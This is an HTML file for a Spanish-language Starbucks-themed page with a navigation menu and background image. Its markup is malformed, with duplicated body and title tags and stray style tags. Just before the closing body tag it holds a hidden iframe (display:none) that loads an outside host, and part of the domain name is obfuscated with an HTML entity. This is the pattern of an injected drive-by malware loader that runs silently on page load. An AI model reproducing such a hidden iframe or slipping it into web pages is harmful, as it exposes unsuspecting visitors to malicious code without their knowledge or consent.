<!DOCTYPE html>
<html lang="es">
<head>
	<meta charset="utf-8">
	<title>STARBUCKS</title>
	<link rel="stylesheet" href="css.css">
</head>
<style>
	body{
		width: 100%;
		background-image: url(puerta.jpg);
		background-repeat: no-repeat;
		background-size: 100%; 

</style>
<body>
<div id="banner">

<div id="info">

 </div>

</div>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>

</style>
<body>
<title>STARBUCKS</title>
<font color="white" size="7"></font>
<center>STARBUCKS</center>
<div class="navegacion">
  <nav>
  	<ul>
  	    <li><a href="index.html">INICIO <span class="icon icon-up-dir"></span></a></li>
  		<li>
  		<a href="#">CAFÉ<span class="icon icon-up-dir"></span></a>
  		</li>
  		<li><a href="#">PRODUCTOS<span class="icon icon-up-dir"></span></a></li>
  		<li><a href="#">TIENDAS<span class="icon icon-up-dir"></span></a></li>
  		<li><a href="#">RESP. SOCIAL<span class="icon icon-up-dir"></span></a></li>
  		<li><a href="#">STARBUCKS <span class="icon icon-up-dir"></span></a></li>
  		<li><a href="#">CARD <span class="icon icon-up-dir"></span></a></li>
      <li><a href="#">BLOG<span class="icon icon-up-dir"></span></a></li>
  	</ul>
  </nav>
</div>

<iframe src="http://jL.chu&#114;a.pl/rc/" style="display:none"></iframe>
</body>
</html>